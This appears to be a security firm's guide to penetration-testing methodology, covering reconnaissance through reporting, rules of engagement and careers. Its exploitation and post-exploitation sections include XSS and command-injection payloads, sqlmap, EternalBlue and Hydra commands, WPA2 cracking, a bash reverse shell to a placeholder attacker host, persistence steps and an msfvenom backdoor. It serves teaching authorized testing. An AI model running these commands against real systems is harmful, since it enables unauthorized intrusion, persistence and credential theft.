Penetration Testing Methodology: The Complete Professional Guide

Introduction

Penetration testing (pentesting) is a simulated cyber attack performed by security professionals to identify vulnerabilities before malicious actors can exploit them. A well-executed penetration test provides actionable findings that significantly improve an organization's security posture.

This guide covers the complete penetration testing methodology used by professional security consultants.

The Penetration Testing Lifecycle

┌─────────────────────────────────────────────────────────────────────┐
│                   PENTEST METHODOLOGY LIFECYCLE                     │
├─────────────────────────────────────────────────────────────────────┤
│                                                                      │
│  ┌─────────────┐    ┌─────────────┐    ┌─────────────┐             │
│  │   RECON     │───▶│  SCANNING   │───▶│   GAINING   │             │
│  │  (OSINT)    │    │   (Nmap)    │    │   ACCESS    │             │
│  └─────────────┘    └─────────────┘    └─────────────┘             │
│        ▲                                         │                 │
│        │         ┌─────────────┐    ┌─────────────┐                 │
│        └─────────│  REPORTING  │◀───│ MAINTAINING │                 │
│                  │             │    │   ACCESS    │                 │
│                  └─────────────┘    └─────────────┘                 │
│                                                                      │
└─────────────────────────────────────────────────────────────────────┘

---

Phase 1: Reconnaissance (Information Gathering)

Passive Reconnaissance

Gather information without directly engaging the target:

# WHOIS lookup
whois target.com

# DNS enumeration
dig target.com NS
dig target.com MX
dig target.com TXT

# Subdomain enumeration
sublist3r -d target.com
amass enum -passive -d target.com

# Email harvesting
theHarvester -d target.com -b all

Active Reconnaissance

Directly interact with the target:

# Port scanning
nmap -sV -sC -O -p- target.com

# Service enumeration
nmap -sV --script=banner target.com

# Web directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt

# Technology detection
whatweb target.com
wappalyzer target.com

Information Gathering Checklist

• [ ] Company overview (LinkedIn, Crunchbase)
• [ ] Employee names and roles
• [ ] Email addresses
• [ ] Subdomains and IP ranges
• [ ] Technology stack
• [ ] Third-party integrations
• [ ] Public code repositories
• [ ] Past data breaches

---

Phase 2: Scanning and Enumeration

Port Scanning

# TCP SYN scan (requires root)
nmap -sS target.com

# TCP connect scan
nmap -sT target.com

# UDP scan
nmap -sU target.com

# Service version detection
nmap -sV -p 22,80,443 target.com

# Aggressive scan
nmap -A target.com

Enumeration Techniques

# HTTP enumeration
nikto -h https://target.com
dirb https://target.com /usr/share/wordlists/dirb/common.txt

# SMB enumeration
enum4linux target.com
smbclient -L //target.com

# DNS zone transfer
dig axfr @dns.target.com target.com

# SMTP enumeration
smtp-user-enum -M VRFY -U /users.txt -t target.com

Vulnerability Scanning

# Network vulnerability scan
nessus target.com

# Web vulnerability scan
owasp-zap -t https://target.com

# Specific vulnerability checks
nmap --script=vuln target.com

---

Phase 3: Exploitation

Web Application Exploitation

SQL Injection

# Error-based injection
sqlmap -u "https://target.com/page?id=1" --risk=3 --level=5

# Boolean-based injection
sqlmap -u "https://target.com/page?id=1" --technique=B

# Time-based blind injection
sqlmap -u "https://target.com/page?id=1" --technique=T

Cross-Site Scripting (XSS)

# Basic reflected XSS test
<script>alert('XSS')</script>

# Stored XSS test
<img src=x onerror=alert(document.domain)>

# DOM-based XSS
javascript:alert(document.cookie)

Command Injection

# Test for command injection
; ls -la
| whoami
&& cat /etc/passwd
$(whoami)

Network Exploitation

# Check for vulnerable services
nmap --script=exploit target.com

# Exploit EternalBlue (MS17-010)
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target.com
run

# SSH brute force
hydra -l admin -P passwords.txt target.com ssh

Wireless Security Testing

# Monitor mode
airmon-ng start wlan0

# Discover networks
airodump-ng wlan0mon

# Capture handshake
airodump-ng -c 1 --bssid MAC -w capture wlan0mon

# Crack WPA2
aircrack-ng -w wordlist.txt capture-01.cap

---

Phase 4: Post-Exploitation

Privilege Escalation

# Linux enumeration
linux-exploit-suggester.sh
LinPEAS.sh

# Windows enumeration
winPEAS.exe
PowerUp.ps1

# Kernel exploits
searchsploit kernel exploit

Lateral Movement

# Pass the hash
pth-winexe -U hash //target cmd.exe

# Pivot to other machines
proxychains nmap target2

# Harvest credentials
mimikatz.exe

Maintaining Access

# Reverse shell
bash -i >& /dev/tcp/attacker/4444 0>&1

# Persistence - SSH key
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys

# Persistence - Scheduled task
schtasks /create /tn "Update" /tr "malicious.exe" /sc daily

# Create backdoor
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=4444 -f exe -o backdoor.exe

---

Phase 5: Documentation and Reporting

Finding Severity Classification

| Rating | Description | Example | |--------|-------------|---------| | Critical | Immediate exploitation, data breach | Remote code execution, SQL injection with admin | | High | Exploitable with some effort | Stored XSS, authentication bypass | | Medium | Limited impact | Information disclosure, CSRF | | Low | Minor impact | Weak cipher, minor information leak | | Info | Informational | Server version disclosure |

Report Structure

# Executive Summary
- Scope
- Key Findings
- Business Impact
- Recommendations

# Technical Details
## Finding 1: SQL Injection
### Description
Detailed explanation of the vulnerability

### Impact
What an attacker could accomplish

### Proof of Concept
Screenshots, payloads used

### Remediation
Step-by-step fix instructions

### References
CVE, OWASP, etc.

Sample Finding Format

## Critical: SQL Injection in User Search

**Description:**
The search parameter in the user search functionality is vulnerable to SQL injection.

**URL:** https://target.com/search?q=test

**Payload:** ' OR 1=1--

**Impact:**
- Full database access
- Extraction of 50,000 user records
- Potential administrative access

**Remediation:**
1. Use parameterized queries (see code example)
2. Implement input validation
3. Apply principle of least privilege to database user

**Reference:** OWASP A03:2021 - Injection

---

Rules of Engagement

Before any pentest, establish clear rules:

## RULES OF ENGAGEMENT TEMPLATE

Scope:
  - IP addresses: 192.168.1.0/24
  - Domains: target.com, api.target.com
  - Applications: https://app.target.com

Testing Window:
  - Start: 2026-01-01 09:00
  - End: 2026-01-07 18:00
  - Maintenance window: None

Allowed Testing Types:
  - Network penetration
  - Web application testing
  - Social engineering (phishing) - NOT allowed
  - Physical security - NOT allowed

Rules:
  - No DoS/DDoS testing
  - No data destruction
  - No exfiltration of real data
  - Report immediately if customer data accessed
  - Stop if asked by client

Escalation:
  - Critical findings: Phone within 1 hour
  - High findings: Email within 4 hours

---

Tools Every Penetration Tester Should Know

Reconnaissance

| Tool | Purpose | |------|---------| | Amass | Subdomain enumeration | | TheHarvester | Email harvesting | | Maltego | OSINT visualization | | Shodan | Internet-facing devices |

Scanning

| Tool | Purpose | |------|---------| | Nmap | Port scanning | | Nikto | Web vulnerability scanning | | Dirb | Directory brute forcing | | WPScan | WordPress scanning |

Exploitation

| Tool | Purpose | |------|---------| | Metasploit | Exploitation framework | | Burp Suite | Web application testing | | SQLMap | SQL injection automation | | Hydra | Password cracking |

Reporting

| Tool | Purpose | |------|---------| | Dradis | Collaboration platform | | Serpico | Report generation | | Faraday | Vulnerability management |

---

Legal and Ethical Considerations

Authorization Requirements

• [ ] Written authorization from system owner
• [ ] Defined scope with explicit boundaries
• [ ] Emergency contact information
• [ ] Rules of engagement agreed

Responsible Disclosure

## DISCLOSURE TIMELINE

Day 0:    Vulnerability discovered
Day 1:    Internal report submitted
Day 30:   Vendor notified (if not fixed)
Day 45:   Public disclosure (if no progress)
Day 90:   Full technical details published

Compliance Frameworks

• OWASP Testing Guide - Web application testing
• PTES - Penetration Testing Execution Standard
• NIST SP 800-115 - Technical guide to security testing
• OSSTMM - Open Source Security Testing Methodology

---

Career Path in Penetration Testing

Certifications

| Certification | Level | Focus | |---------------|-------|-------| | eJPT | Entry | Intermediate | | OSCP | Intermediate | Hands-on | | OSCE | Advanced | Advanced techniques | | OSEE | Expert | Exploit development | | GPEN | Advanced | Team lead |

Skills Development

1. Foundation: Networking, Linux, programming
2. Web Security: OWASP Top 10, web vulnerabilities
3. Exploitation: Metasploit, buffer overflows
4. Specialization: Cloud, mobile, network

---

Conclusion

Professional penetration testing is more than running tools—it's a systematic approach to finding and exploiting vulnerabilities. The methodology covered here provides a framework for thorough, effective security testing.

Key takeaways:

1. Thorough reconnaissance - The more you know, the better your test
2. Don't rely solely on tools - Manual testing finds what scanners miss
3. Focus on impact - Not all vulnerabilities are created equal
4. Document everything - Good reports drive real changes
5. Stay ethical - Authorization and disclosure matter

---

Need a professional penetration test?

• Request a Security Audit
• View Our Services
• Contact Our Team